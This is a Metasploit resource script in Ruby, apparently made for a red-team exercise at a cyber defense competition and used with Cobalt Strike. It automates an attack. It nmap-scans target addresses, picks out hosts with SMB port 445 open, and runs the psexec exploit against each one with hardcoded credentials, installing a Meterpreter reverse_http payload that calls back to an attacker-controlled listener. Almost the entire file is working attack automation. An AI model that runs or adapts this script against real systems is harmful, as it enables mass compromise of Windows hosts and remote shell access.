################################################
# Modified by @jgaudard  :: I don't twitter much
# Resource file for metasploit.
# Copied from nodocify at NCCCDC, modified to match
# my other psexec resource script.
# Use with cobaltstrike's beacon
# Created: 2 April 2017    Edited: 3 April 2017
# Version 1.0
#################################################

<ruby>

smbdomain = "."
smbuser = "user"
smbpass = "abc123!!!"
lhost = "133.7.1.1"
lport = "443"
targets = "133.7.150.150"
targets_file = "/root/targets.lst"


### Setup Workspace ###
run_single("workspace -d autopwn")
run_single("workspace -a autopwn")
run_single("workspace autopwn")  #probably redundant

### if targets_file then....
# self.run_single("db_nmap -T5 -sS -O -n -p T:22,445,3389,4444 -iL #{targets_file}")
### else
self.run_single("db_nmap -T5 -sS -O -n -p T:22,445,3389,4444 #{targets}")

hosts = []
begin
  framework.db.services.each do |service|
    if ( service.port ==445 and service.state == 'open' and service.proto == 'tcp')
      hosts << {'ip' => service.host.address}
        end
    end
end

self.run_single("use exploit/windows/smb/psexec")

hosts.each do |rhost|
  self.run_single("set PrependMigrate true")  
  self.run_single("set DisablePayloadHandler true")
  self.run_single("set RHOST #{rhost['ip']}")
  self.run_single("set PAYLOAD windows/meterpreter/reverse_http")
  self.run_single("set LHOST #{lhost}")
  self.run_single("set LPORT #{lport}")
  self.run_single("set SMBDOMAIN #{smbdomain}")
  self.run_single("set SMBUSER #{smbuser}")
  self.run_single("set SMBPASS #{smbpass}")
  self.run_single("exploit -j")
  sleep 1
end
</ruby>
